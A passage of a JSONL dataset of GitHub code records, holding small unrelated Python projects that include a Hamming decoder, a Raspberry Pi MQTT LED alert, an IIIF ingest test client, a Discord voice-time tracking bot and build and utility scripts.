1]])\n\n\ndef parse_arguments():\n \"\"\"\n Handle and parse program arguments.\n\n Returns:\n argparse.Namespace: namespace with 2 parsed arguments:\n - in1 -- one input file\n - in2 -- another input file\n \"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Kodowanie pliku korzystająć z rozszerzonego kodu Hamminga (8, 4)'\n )\n\n arg_parser.add_argument(\n 'input_file',\n help='Plik wejściowy',\n\n )\n\n arg_parser.add_argument(\n 'output_file',\n help='Zakodowany plik wyjściowy'\n )\n\n return arg_parser.parse_args()\n\n\nclass HammingDecoder:\n def __init__(self):\n self.doubleErrorCounter = 0\n\n def decode(self, bit_array):\n parity = bit_array[-1]\n bit_array = bit_array[:-1]\n wrong_bit = np.dot(CORRECTION_MATRIX, bit_array) % 2\n wrong_bit = int(f\"0b{''.join(map(str, wrong_bit))}\", 2)\n\n if wrong_bit > 0:\n if parity == 0:\n self.doubleErrorCounter += 1\n else:\n if wrong_bit < 5:\n bit_array[wrong_bit-1] = int(not bit_array[wrong_bit-1])\n\n return bit_array[:4]\n\n\ndef decode():\n \"\"\"Decode file with Hamming coding.\"\"\"\n args = parse_arguments()\n hc = HammingDecoder()\n with contextlib.closing(BitInputStream(open(args.input_file, \"rb\"))) as bit_in, \\\n contextlib.closing(BitOutputStream(open(args.output_file, \"wb\"))) as bit_out:\n bits = bit_in.bits_array(8)\n while bits.size > 0:\n bit_out.write_array(hc.decode(bits))\n bits = bit_in.bits_array(8)\n print(\"Zdekodowano\")\n print(\"Liczba podwójnych błędów:\", hc.doubleErrorCounter)\n\n\nif __name__ == \"__main__\":\n decode()\n","repo_name":"barchuckie/co-co","sub_path":"zad7/dekoder.py","file_name":"dekoder.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10944001651","text":"# Luke Chase\n# Updated Alice_Words program --- Assessment Program\n# Computer Science II\n# October 1, 2017\ntry:\n file = open(\"Alice's_Adventures_In_Wonderland_via_Gutenberg.txt\", \"r\")\n file = file.read()\n def sort(text):\n dictionary = {}\n alphabetical_dictionary = {}\n word = \"\"\n for aline in text:\n letter = aline\n if letter!= \" \":\n word = word + letter\n else:\n dictionary[word] = text.count(word)\n word = \"\"\n key_list = list(dictionary.keys())\n key_list = sorted(dictionary)\n begin = key_list.index(\"A\")\n for i in key_list[begin:]:\n alphabetical_dictionary[i] = text.count(i)\n return alphabetical_dictionary\n\n dictionary = print(sort(file))\n\n try:\n text_thing = open(\"GET_WRITTEN_ON_YA_ALICE\", \"w\")\n try:\n text_thing.write(str(dictionary))\n finally:\n text_thing.close()\n finally:\n text_thing.close()\nexcept IOError:\n print(\"This file is not found.\")\n","repo_name":"SlyesKimo123/ComputadoraScience2","sub_path":"Assessment/Assessment Program(Alice_Words).py","file_name":"Assessment Program(Alice_Words).py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74907586921","text":"# from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom distutils.dir_util import copy_tree\nfrom livereload import Server\nfrom pathlib import Path\nimport contextlib\nimport subprocess\nimport shutil\nimport glob\nimport sys\nimport os\n\nRELEASE_MODE = len(sys.argv) >= 2 and sys.argv[1] == \"--release\"\n\n\ndef supress_stdout(func):\n def wrapper(*a, **ka):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n func(*a, **ka)\n return wrapper\n\n\ndef make_required_directories():\n Path(\"./build/smooth/__target2__\").mkdir(exist_ok=True, parents=True)\n Path(\"./output\").mkdir(exist_ok=True, parents=True)\n\n\ndef js_to_py(filename):\n return str(filename).replace(\".js\", \".py\")\n\n\ndef js_to_svelte(filename):\n return str(filename).replace(\".js\", \".svelte\")\n\n\ndef copy_to_svelte_project_dir():\n for f in glob.glob('./src/*.*'):\n shutil.copy(f, './build/src')\n for f in glob.glob('./src/pages/*.svelte'):\n shutil.copy(f, './build/src/pages')\n\n\ndef copy_to_root():\n for f in glob.glob('./src/root/*'):\n shutil.copy(f, './output')\n\n\ndef run_transcrypt():\n for f in glob.glob(\"./build/smooth/pages/*.py\"):\n cmd = f\"python ./cryptic/src/__main__.py -b -n -g {f}\"\n subprocess.run(cmd, shell=True, stdout=open(os.devnull, \"w\"))\n copy_tree(\"./build/smooth/pages/__target__\",\n \"./build/smooth/__target2__\")\n\n\ndef append_transpiled_python():\n files = glob.glob(\"./build/smooth/__target2__/*.js\")\n for f in files:\n if \"org.transcrypt.__runtime__\" in f:\n shutil.copy(f, './build/src/pages')\n continue\n with open(f, \"r\") as reader:\n file_contents = reader.read()\n file_contents = \"\"\n file_name = Path(f).name\n svelte_file_name = js_to_svelte(file_name)\n with open(f\"./build/src/pages/{svelte_file_name}\", \"a\") as writer:\n writer.write(\"\")\n writer.write(file_contents)\n\n\ndef rollup():\n if RELEASE_MODE:\n subprocess.run(\"npm run build-prod\", cwd=\"./build\", shell=True)\n else:\n subprocess.run(\"npm run build-dev\", cwd=\"./build\", shell=True)\n\n\ndef run(port=4200):\n server = Server()\n server.watch('src', refresh)\n server.serve(port=port, root='output')\n\n\ndef refresh():\n copy_tree(\"./src\", \"./build/smooth\")\n make_required_directories()\n run_transcrypt()\n copy_to_svelte_project_dir()\n copy_to_root()\n append_transpiled_python()\n rollup()\n\n\nif __name__ == \"__main__\":\n refresh()\n if not RELEASE_MODE:\n run()\n","repo_name":"chris-koch-penn/smooth.py","sub_path":"smoothie.py","file_name":"smoothie.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11409363752","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\nimport threading\r\nimport random\r\nimport RPi.GPIO as GPIO\r\nfrom registration import *\r\nfrom MyMQTT import *\r\n\r\n# The RPi controls a LED which is activated based on the freezing status\r\n# MQTT methods:\r\n# subscriber to retrieve info on the freezing status \r\n\r\nclass RPi():\r\n def __init__(self,broker,port,topic, LED_red, LED_green, LED_white):\r\n self.client=MyMQTT('RPI',broker,port,self)\r\n self.topic=topic\r\n self.LED_red = LED_red\r\n self.LED_green = LED_green\r\n self.LED_white = LED_white\r\n self.client.start()\r\n self.client.mySubscribe(self.topic)\r\n def stop(self):\r\n self.client.stop() \r\n def notify(self,payload): \r\n alert = json.loads(payload)\r\n dataIncoming = alert['result'] \r\n # format message: 1 for freezing for sure, 2 for possible freezing, 3 no freezing \r\n \r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW) \r\n\r\n if dataIncoming == 1: \r\n # 1 = freezing for sure\r\n print('Freezing for sure')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds\r\n while end - start < 5:\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n\r\n elif dataIncoming == 2: \r\n # 2 = possible freezing\r\n print('Possible freezing')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds \r\n while end - start < 5:\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n \r\n else:\r\n print('No freezing')\r\n GPIO.output(self.LED_green, GPIO.HIGH) # green led is switched on in order to \r\n\r\n\r\nclass Update(threading.Thread): # Multithreading for doing the update\r\n def __init__(self, threadID,time_update,sr):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.time_update=time_update\r\n self.sr=sr\r\n def run(self):\r\n while True:\r\n self.sr.update()\r\n time.sleep(self.time_update)\r\n\r\n\r\nif __name__=='__main__':\r\n # 1. SERVICE REGISTRATION to catalog \r\n conf = json.load(open('settings.json')) # read data from settings.json\r\n payload = conf[\"ServiceData\"] # retrieve service data\r\n catalog_URL=conf[\"catalogURL\"] # retrieve catalog url\r\n service = registration(catalog_URL, payload)\r\n try: \r\n service.register()\r\n except:\r\n print('Catalog not connected!')\r\n raise SystemExit\r\n\r\n subscribeTopic = conf[\"ServiceData\"][\"MQTT_Topic\"]\r\n info=(requests.get(catalog_URL+\"/broker\")).json()\r\n\r\n # Set up the Raspberry pi\r\n # set up pin numbering\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setwarnings(False)\r\n\r\n # Assign a pin number to every led corresponding to the raspberry pi header\r\n LED_red = 7 #GPIO4\r\n LED_green = 11 #GPIO17\r\n LED_white = 13 #GPIO27\r\n\r\n # Set the output to the correct pin\r\n GPIO.setup(LED_red, GPIO.OUT)\r\n GPIO.setup(LED_green, GPIO.OUT)\r\n GPIO.setup(LED_white, GPIO.OUT)\r\n\r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW)\r\n\r\n rpi=RPi(info['broker'][\"url\"],info['broker'][\"port\"],subscribeTopic, LED_red, LED_green, LED_white) \r\n t1 = Update(1,conf['timeforupdate'],service) #updating the timestamp of the service \r\n t1.start()\r\n t1.join()\r\n\r\n while True:\r\n time.sleep(10)\r\n","repo_name":"Joseph9994/Agropy","sub_path":"RPi/Rpi.py","file_name":"Rpi.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5119021857","text":"import psycopg2\nimport time\n\nfrom Connection import Connection, Listener\nfrom functools import partial\nfrom handlers.request_handlers import list_products, create_product, create_db, seed_db\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(host=\"postgres\", port=5432, user=\"postgres\")\n request_handlers = {\n \"list-products\": partial(list_products, conn),\n \"create-product\": partial(create_product, conn),\n \"create-database\": partial(create_db, conn),\n \"seed-database\": partial(seed_db, conn),\n }\n c = Connection(\n \"main-queue\",\n \"control-queue\",\n 61613,\n Listener(request_handlers=request_handlers),\n \"warehouse-message-handler\",\n )\n\n while True:\n # keep app running to prevent docker from terminating\n time.sleep(0.01)\n","repo_name":"StefanEvanghelides/eai2019","sub_path":"WarehouseMessageHandler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19200050292","text":"# check if list is a mountain array\n# Leetcode, arrays 101\n\n# so many exceptions....\n\nclass Solution:\n def validMountainArray(self, arr: list) -> bool:\n mountain = False\n peak = 0\n\n for i in range(1, len(arr) - 1):\n if arr[i] == arr[i - 1]:\n return False\n\n if arr[i] < arr[i - 1] and arr[i] <= arr[i + 1]:\n peak += 1\n if arr[i] > arr[i - 1] and arr[i] >= arr[i + 1]:\n peak += 1\n\n if peak >= 1 and arr[i] <= arr[i + 1]:\n return False\n\n if peak == 1:\n mountain = True\n\n return mountain\n\nif __name__ == \"__main__\":\n test_arr = [1,1,1,1,1,1,1,2,1]\n\n test_obj = Solution()\n print(test_obj.validMountainArray(test_arr))\n","repo_name":"karanpolobotu/PythonCatchup","sub_path":"Python3code/02-2022/feb19.py","file_name":"feb19.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16643955804","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport boto3\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.join(ROOT_DIR, 'src'))\n\n\nfrom IIIFingest.auth import Credentials # noqa: E402\nfrom IIIFingest.client import Client # noqa: E402\n\n\ndef test_ingest_pipeline(args) -> None:\n\n # Logging configuration\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n pkg = logging.getLogger('IIIFingest')\n pkg.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Client configuration\n asset_prefix = args.asset_prefix\n issuer = args.issuer\n space = args.space\n environment = args.environment\n session = boto3.Session(profile_name=f\"mps-{space}-{environment}\")\n\n jwt_creds = Credentials(\n issuer=issuer,\n kid=f\"{issuer}default\",\n private_key_path=os.path.join(\n ROOT_DIR, f\"auth/{environment}/keys/{issuer}/{issuer}default/private.key\"\n ),\n )\n\n client = Client(\n space=space,\n environment=environment,\n asset_prefix=asset_prefix,\n jwt_creds=jwt_creds,\n boto_session=session,\n )\n\n images = [\n {\n \"label\": \"27.586.126A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest1.tif\"),\n },\n {\n \"label\": \"27.586.248A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest2.tif\"),\n \"metadata\": [{\"label\": \"Test\", \"value\": \"Image level metadata\"}],\n },\n {\n \"label\": \"27.586.249A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest3.tif\"),\n },\n ]\n\n manifest_level_metadata = {\n \"labels\": [\"Test Manifest MCIH\"],\n \"metadata\": [\n {\n \"label\": \"Creator\",\n \"value\": \"Unknown\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n {\n \"label\": \"Date\",\n \"value\": \"19th Century\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n ],\n \"required_statement\": [{\"label\": \"Attribution\", \"value\": \"Jinah Kim\"}],\n \"default_lang\": \"en\",\n \"service_type\": \"ImageService2\",\n \"service_profile\": \"level2\",\n \"rights\": \"http://creativecommons.org/licenses/by-sa/3.0/\",\n \"summary\": \"A test manifest for Mapping Color in History ingest into MPS IIIF delivery solution\",\n \"providers\": [\n {\n \"labels\": [\n {\n \"lang\": \"en\",\n \"value\": \"Harvard University - Arts and Humanities Research Computing (organizing org)\",\n }\n ],\n \"id\": \"http://id.loc.gov/authorities/names/n78096930\",\n },\n {\n \"labels\": [{\"value\": \"Harvard Art Museum (providing org)\"}],\n \"id\": \"http://id.loc.gov/authorities/names/no2008065752\",\n },\n ],\n }\n\n assets = client.upload(images=images, s3_path=\"images/\")\n\n manifest = client.create_manifest(\n manifest_level_metadata=manifest_level_metadata,\n assets=assets,\n )\n\n result = client.ingest(\n assets=assets,\n manifest=manifest,\n )\n\n status = client.jobstatus(result[\"job_id\"])\n print(\"Done: \", status)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--issuer\", \"-i\", help=\"set issuer\", default=\"atdarth\")\n parser.add_argument(\"--space\", \"-s\", help=\"set space\", default=\"atdarth\")\n parser.add_argument(\"--environment\", \"-e\", help=\"set environment\", default=\"qa\")\n parser.add_argument(\"--asset-prefix\", \"-a\", help=\"set asset prefix\", default=\"\")\n args = parser.parse_args()\n test_ingest_pipeline(args)\n","repo_name":"martimpassos/iiif-ingest-service","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"43350948211","text":"from flask import Flask\nfrom parse import Parser\nfrom vectorizer import Vect\n\napp = Flask(__name__)\nparsewiki = Parser(\"../data/WestburyLab.Wikipedia.Corpus.txt\")\n\nvectorCreator = Vect()\n\"\"\"\nUncomment the next line for:\n- Parse Baseline Benchmark\n- Sequential Search Baseline Benchmark\n\"\"\"\n#parsewiki.parse()\n#parsewiki.vanillaQuery(\"Debargha\")\n\n\"\"\"\nUncommment the next line to build a search index\nIndex will be built in SQLite3 for a full text search\n\"\"\"\n#parsewiki.buildIndex()\n\n@app.route('/query/')\ndef query(querystring):\n \"\"\"\n - Use words in search query that are not stopwords\n - Replace those words with synonyms\n - Replace those words with the Word2Vec embeddings\n - Replace those words with the BERT embeddings\n - Replace those words with the AlBERT embeddings\n - Use the augmented strings to run the search\n \"\"\"\n\n closest = []\n try:\n closest = vectorCreator.closest_three(querystring)\n except:\n print(\"Word not in vocabulary\")\n\n\n return(parsewiki.queryIndex(\"{}\".format(querystring)))\n\n#parsewiki.queryIndex(\"Capitalism is terrible\")\n#parsewiki.queryIndex(\"Heart attack symptoms\")\n#parsewiki.queryTableBM25(\"Capitalism is terrible\")\n#parsewiki.queryTableHighlight(\"Sugar\")\n","repo_name":"DebarghaG/Semoogle","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38981193847","text":"import csv\nimport numpy as np\n\ndef parse_horizon(infile):\n \"\"\"\n Reads a horizon file output from openDetect. Contains inline, xline,\n and offsets\n \"\"\"\n \n ils, xls, values = ([],[],[])\n with open(infile, 'r') as f:\n reader=csv.reader(f, delimiter='\\t')\n for il, xl,z, zero, five, ten, ft, twen, tf, t, tf in reader:\n ils.append(int(il)-1)\n xls.append(int(xl)-1)\n point = [float(i) for i in[zero, five, ten, ft, twen, tf, t, tf]]\n values.append(point)\n \n value_array = np.array(values)\n inlines = np.array(ils)\n xlines = np.array(xls)\n horizons = np.zeros((np.amax(inlines)-np.amin(inlines) +1, \n np.amax(xlines) - np.amin(xlines)+1, value_array.shape[1]))\n horizons[inlines-np.amin(inlines), xlines - np.amin(xlines), :] += values\n \n return horizons\n\ndef horizon_norm(horizon):\n \"\"\"\n Normalize a horizon to unit energy across the offset dimension. Filters out\n zero energy and offset curves with NaNs.\n \"\"\"\n \n normed = np.nan_to_num(horizon / np.sqrt(np.sum(horizon**2, 2))[:,:, np.newaxis])\n normed = normed.reshape(normed.shape[0]*normed.shape[1], normed.shape[2])\n \n normed = normed[np.sum(normed,1) > 0]\n \n return normed\n","repo_name":"ben-bougher/admm_opt","sub_path":"horizon_parse.py","file_name":"horizon_parse.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114448041","text":"# \r\n# Given an array nums and a value val, remove all instances of that value in-place and return the new length.\r\n# \r\n# Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\r\n# \r\n# The order of elements can be changed. It doesn't matter what you leave beyond the new length.\r\n# \r\n\r\nfrom typing import List\r\nimport pdb\r\n\r\nsolution_json = {\r\n \"date\": \"2021/3/24\",\r\n \"runtime\": \"36 ms\",\r\n \"memory\": \"14.1 MB\"\r\n}\r\n\r\nclass Solution:\r\n def removeElement(self, nums: List[int], val: int) -> int:\r\n idx = 0\r\n for i in range(len(nums)):\r\n line = ''\r\n line += 'nums[%d] = %d, ' % (i, nums[i])\r\n if nums[i] != val:\r\n nums[idx] = nums[i]\r\n line += 'nums[%d] = %d, ' % (idx, nums[idx])\r\n idx += 1\r\n #print(line)\r\n return idx\r\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_04_fun_with_arrays/solutions/0027-rm-element-s1.py","file_name":"0027-rm-element-s1.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6306245286","text":"from troposphere import Output, Ref, Template\nfrom troposphere.s3 import Bucket, PublicRead\n\nt = Template(\"Create multiple S3 Bucket for XKE\")\nt.set_version()\n\nfor i in range(1, 10):\n s3_bucket = t.add_resource(Bucket(\"TestBucket\" + str(i),\n BucketName=\"xke-test-bucket-\" + str(i),\n AccessControl=PublicRead))\n t.add_output(Output(\n \"BucketName\" + str(i),\n Value=Ref(s3_bucket),\n Description=\"Name of S3 bucket\"\n ))\n\nprint(t.to_json())\n","repo_name":"fdebuire/cloudformation-troposhere-xke","sub_path":"2-troposphere/S3_multiple_bucket.py","file_name":"S3_multiple_bucket.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37042588954","text":"import os\n\npath = '/home/lowpaw/Downloads/telegram-bibtexbot/notes'\nnotes_list = os.listdir(path)\nnotes_list.sort()\n\ncontents = []\n\nfor note_name in notes_list:\n fo = open(path + '/' + note_name, 'r')\n contents.append(fo.read())\n fo.close()\n\ncontents = '\\n\\n'.join(contents)\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.md', \"w\")\nfo.write(contents)\nfo.close()\n\n# html is generated with:\n# https://www.makeuseof.com/md-block-render-markdown-web-page/\n\nnotes_html = ['''\n\n\n\n\n\n\n\n\n''','''\n\n\n\n\n\n'''\n]\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.html', \"w\")\nfo.write(contents.join(notes_html))\nfo.close()\n","repo_name":"lapamatoz/telegram-bibtexbot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3637200461","text":"#!python3\n\nimport asyncio\nimport datetime\nimport discord\nimport json\nfrom sqlalchemy import Column, DateTime, Interval, Boolean, String\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport sys\n\n# Database setup\nBase = declarative_base()\n\nclass Member(Base):\n __tablename__ = 'members'\n id = Column(String, primary_key=True)\n name = Column(String)\n last_join = Column(DateTime)\n total_time = Column(Interval)\n in_chat = Column(Boolean)\n\n def update_total_time(self):\n \"\"\"Update total_time with time since last_join\"\"\"\n now = datetime.datetime.now()\n self.total_time += now - self.last_join\n self.last_join = now\n\nengine = create_engine('sqlite:///member_tracker.sqlite')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n# Discord client\nclient = discord.Client()\n\n# Helpers\ndef update_active_users():\n \"\"\"Updates total_time for all active users\"\"\"\n s = session()\n for channel in client.get_all_channels():\n for member in channel.voice_members:\n if not member.voice.is_afk:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n dbmember.in_chat = True\n dbmember.update_total_time()\n except NoResultFound:\n dbmember = Member(\n id=member.id,\n name=member.nick if member.nick else member.name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=True\n )\n s.add(dbmember)\n s.commit()\n\ndef check_admin(message):\n \"\"\"Checks if the message is from an administrator\"\"\"\n perms = message.channel.permissions_for(message.author)\n is_admin = perms.administrator\n try:\n for role in message.author.roles:\n if \"Admins\" in role.name or \"Founder\" in role.name:\n is_admin = True\n break\n except AttributeError:\n # Bypass for redkrieg to work in private messages\n if str(message.author.id) == \"135195179219943424\":\n is_admin = True\n return is_admin\n\ndef format_timedelta(td):\n \"\"\"Formats timedelta without microseconds\"\"\"\n # Modified from stdlib datetime.timedelta.__str__\n mm, ss = divmod(td.seconds, 60)\n hh, mm = divmod(mm, 60)\n s = \"%d:%02d:%02d\" % (hh, mm, ss)\n if td.days:\n def plural(n):\n return n, abs(n) != 1 and \"s\" or \"\"\n s = (\"%d day%s, \" % plural(td.days)) + s\n return s\n\n\n# Background events\nasync def active_user_update_loop():\n \"\"\"Reset join times, wait for discord connection, then keep db synced\"\"\"\n s = session()\n members = s.query(Member).all()\n now = datetime.datetime.now()\n for member in members:\n member.in_chat = False\n member.last_join = now\n s.commit()\n await client.wait_until_ready()\n while not client.is_closed:\n update_active_users()\n await asyncio.sleep(60)\n\n# Discord events\n@client.event\nasync def on_voice_state_update(before, after):\n \"\"\"Monitor status updates for voice channels\"\"\"\n s = session()\n # prefer nickname in server to actual discord username\n member_name = before.nick if before.nick else before.name\n try:\n member = s.query(Member).filter(Member.id == before.id).one()\n # update member names on each channel join\n member.name = member_name\n except NoResultFound:\n member = Member(\n id=before.id,\n name=member_name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=False\n )\n s.add(member)\n if after.voice.voice_channel is None:\n if member.in_chat:\n member.in_chat = False\n member.update_total_time()\n try:\n channel_name = before.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Unknown\"\n print(\"{} left voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n else:\n if member.in_chat:\n # Don't consider deafened or afk users as active\n if after.voice.is_afk or after.voice.self_deaf or after.voice.deaf:\n # This logic breaks if the user is server deafened and\n # self-deafens as well. Need to think through.\n member.in_chat = False\n member.update_total_time()\n else:\n member.in_chat = True\n member.last_join = datetime.datetime.now()\n try:\n channel_name = after.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Private\"\n print(\"{} joined voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n s.commit()\n sys.stdout.flush()\n\n@client.event\nasync def on_message(message):\n \"\"\"Handles incoming messages\"\"\"\n if message.author == client.user:\n return\n\n if not check_admin(message):\n return\n\n if message.content.startswith('!velocistats'):\n s = session()\n if len(message.mentions) > 0:\n for member in message.mentions:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n except NoResultFound:\n await client.send_message(\n message.channel,\n \"User {} not found!\".format(\n member.nick if member.nick else member.name\n )\n )\n continue\n if dbmember.in_chat:\n dbmember.update_total_time()\n s.commit()\n await client.send_message(\n message.channel,\n \"User {0} has a total chat time of {1}\".format(\n dbmember.name,\n format_timedelta(dbmember.total_time)\n )\n )\n elif message.content.startswith('!velocistats low'):\n members = s.query(Member).order_by(\n Member.total_time.asc()\n ).filter(\n Member.name.startswith('-=[ V ]=-')\n ).limit(10).all()\n msg = [ \"\"\"Current Lowest Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n else:\n members = s.query(Member).order_by(\n Member.total_time.desc()\n ).limit(10).all()\n msg = [ \"\"\"Current Top Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n\n@client.event\nasync def on_ready():\n \"\"\"Print out some status info on connect\"\"\"\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n sys.stdout.flush()\n\n# Configuration\nwith open('token.json') as f:\n token = json.load(f)['token']\n \n# Run it\nclient.loop.create_task(active_user_update_loop())\nclient.run(token)\n","repo_name":"RedKrieg/velocibot","sub_path":"velocibot.py","file_name":"velocibot.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"20306377355","text":"\ndef move_x(location_x):\n \n \n # center x pixel\n center_x = 424\n\n # find difference between center and object, postive number means to the right\n diff_x = location_x - center_x\n\n #if object is to the right\n if (diff_x > 300):\n return 1\n\n elif (diff_x > 200):\n return 2\n\n elif (diff_x > 100):\n return 3\n\n elif (diff_x > 10):\n return 4\n\n #if object is to the left \n elif (diff_x < -300):\n return -1\n \n elif (diff_x < -200):\n return -2\n \n elif (diff_x < -100):\n return -3\n \n elif (diff_x < -10):\n return -4\n\n #if object is in neither then do nothing so return 0\n else:\n return 200\n\n# find direction to turn motor\ndef find_direction(data):\n direction = 0\n if (data > 0):\n direction = 0\n else:\n direction = 1\n direction = \"setDirection:\" + str(direction)\n return direction\n \n# calculate angle to send to motors\ndef calc_angle(data):\n angle = 0\n diff = abs(data)\n\n if diff == 1:\n angle = 30\n elif diff == 2:\n angle = 20\n elif diff == 3:\n angle = 10\n elif diff == 4:\n angle = 3\n else:\n angle = 0\n\n angle = \"moveMotor:\" + str(angle)\n return angle\n\n\n\n\n\ndef move_y(location_y):\n \n # center x pixel\n center_y = 240\n\n # find difference between center and object, postive number means to the right\n diff_y = location_y - center_y\n\n #if object is to the below\n if (diff_y > -200):\n return 1\n\n elif (diff_y > -100):\n return 2\n\n #if object is to the above \n elif (diff_y < 200):\n return -1\n \n elif (diff_y < 100):\n return -2\n\n #if object is in neither then do nothing so return 0\n else:\n return 200","repo_name":"ClaytonWilson12/nerf","sub_path":"scripts/servo_instruction.py","file_name":"servo_instruction.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40636754268","text":"#Библиотека c эмодзи\nfrom emoji import emojize\n#Импорт settings.py для сокрытия токенов, паролей и личных данных\nimport settings\n#Модуль random отвечает за работу со случайными числами, функция randint - за целые числа; choice - за выбор случайного элемента\nfrom random import randint, choice\n#Класс для создания клавиатур\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton\n\n\n#Функция получения смайлика\ndef get_smile(user_data):\n if 'emoji' not in user_data:\n smile = 